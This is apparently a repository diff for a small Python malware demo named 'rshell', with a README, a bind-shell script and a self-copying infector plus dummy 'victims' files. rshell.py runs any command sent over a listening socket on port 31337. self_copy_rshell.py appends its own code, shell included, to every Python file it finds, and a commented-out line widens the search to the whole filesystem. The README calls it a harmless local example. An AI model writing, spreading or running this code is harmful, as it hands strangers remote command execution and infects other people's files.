DO NOT PRINT ERRORS

README.md

@@ -1,3 +1,33 @@
 # rshell
 
-Reverse shell testing example
+Nothing to worry about.
+
+## rhsell.py
+
+To run the example execute the rshell skript.
+
+```bash
+$ python rshell.py
+```
+
+It will open a reverse shell on port 31337 on the local system. You can connect
+to it using 
+
+```bash
+$ nc 0.0.0.0 31337
+```
+
+## self_copy_test.py
+
+Code snippet that searches files based on a search string and copies its
+content into all matched files. There is a local `victims` folder for testing
+purposes.
+
+## Putting things together
+
+```bash
+$ python self_copy_rshell.py
+```
+
+Runs code that seraches for victim files and deploys a appends the reverse
+shell snippet. The example only searches the local `victims` folder.

rshell.py

@@ -0,0 +1,24 @@
+import sys
+import os
+import socket
+
+pid = os.fork()
+
+if pid > 0:
+  sys.exit(0)
+try:
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.bind(("0.0.0.0",31337))
+  s.listen(1)
+except socket.error as e:
+  print(e)
+  sys.exit(0)
+while 1:
+  (cli,add) = s.accept()
+  info = {"platform":sys.platform, "version":sys.version}
+  welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info)
+  cli.send(welcome.encode('utf-8'))
+  while 1:
+    data = cli.recv(1024).rstrip()
+    resp = os.popen(data.decode('utf-8')).read()
+    cli.send(resp.encode('utf-8'))

self_copy_rshell.py

@@ -0,0 +1,65 @@
+import os                                               #!x
+import sys                                              #!x
+import glob                                             #!x
+import socket                                           #!x
+import string                                           #!x
+
+# search command, adjust to your needs
+#cmd = 'find / -name "*.py" -print'                     #!x
+cmd = 'find ./victims -name "*.py" -print 2>/dev/null'  #!x
+# keyword which prevents file from getting infected
+keyword = 'plsdontinjectme'                             #!x
+
+# for each file that matches the search command
+for snippet in os.popen(cmd).readlines():               #!x
+  # strip newlines
+  snippet = snippet[:-1]                                #!x
+  try:                                                  #!x
+    # open this file containing the target code
+    code = open(__file__, 'r')                          #!x
+    # open victim file
+    victim = open(snippet, 'r')                         #!x
+    # read the content of the victim file
+    read_victim = victim.read()                         #!x
+    # if the file contains keyword, do not inject code
+    if str.find(read_victim, keyword) == -1:            #!x
+      # open it with write_append rights
+      victim = open(snippet, 'a')                       #!x
+      # for each line in 
+      for line in code.readlines():                     #!x
+        # if the line contains the copy signal
+        if("#!x") in line:                              #!x
+          # close the code file
+          code.close()                                  #!x
+          # cast the line containing code
+          insert=(line)                                 #!x
+          # insert the code into the victim file
+          victim.write(insert)                          #!x
+  # poor mans error handling
+  except IOError:                                       #!x
+    a = 1                                               #!x
+
+# fork to bg
+pid = os.fork()                                         #!x
+# make sure we are in the child process
+if pid > 0:                                             #!x
+  sys.exit(0)                                           #!x
+try:                                                    #!x
+  # create the socket and listen
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x
+  s.bind(("0.0.0.0",31337))                             #!x
+  s.listen(1)                                           #!x
+# poor mans socket error handling
+except socket.error as e:                               #!x
+  sys.exit(0)                                           #!x
+# forever try to accept new connections
+while 1:                                                #!x
+  (cli,add) = s.accept()                                #!x
+  info = {"platform":sys.platform, "version":sys.version}   #!x
+  welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x
+  cli.send(welcome.encode('utf-8'))                     #!x
+  # forever receive cli commends, execute and report back
+  while 1:                                              #!x
+    data = cli.recv(1024).rstrip()                      #!x
+    resp = os.popen(data.decode('utf-8')).read()        #!x
+    cli.send(resp.encode('utf-8'))                      #!x

self_copy_test.py

@@ -0,0 +1,41 @@
+import os                                               #!x
+import sys                                              #!x
+import glob                                             #!x
+import socket                                           #!x
+import string                                           #!x
+
+# search command, adjust to your needs
+#cmd = 'find / -name "*.py" -print'                     #!x
+cmd = 'find ./victims -name "*.py" -print'              #!x
+# keyword which prevents file from getting infected
+keyword = 'plsdontinjectme'                             #!x
+
+# for each file that matches the search command
+for snippet in os.popen(cmd).readlines():               #!x
+  print(snippet)
+  # strip newlines
+  snippet = snippet[:-1]                                #!x
+  try:                                                  #!x
+    # open this file containing the target code
+    code = open(__file__, 'r')                          #!x
+    # open victim file
+    victim = open(snippet, 'r')                         #!x
+    # read the content of the victim file
+    read_victim = victim.read()                         #!x
+    # if the file contains keyword, do not inject code
+    if str.find(read_victim, keyword) == -1:            #!x
+      # open it with write_append rights
+      victim = open(snippet, 'a')                       #!x
+      # for each line in 
+      for line in code.readlines():                     #!x
+        # if the line contains the copy signal
+        if("#!x") in line:                              #!x
+          # close the code file
+          code.close()                                  #!x
+          # cast the line containing code
+          insert=(line)                                 #!x
+          # insert the code into the victim file
+          victim.write(insert)                          #!x
+  # poor mans error handling
+  except IOError:                                       #!x
+    a = 1                                               #!x

victims/a.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/b.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/c.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/d.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/e.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/f.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/g.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/h.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/j.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")

victims/k.py

@@ -0,0 +1,2 @@
+import string
+print("hello world")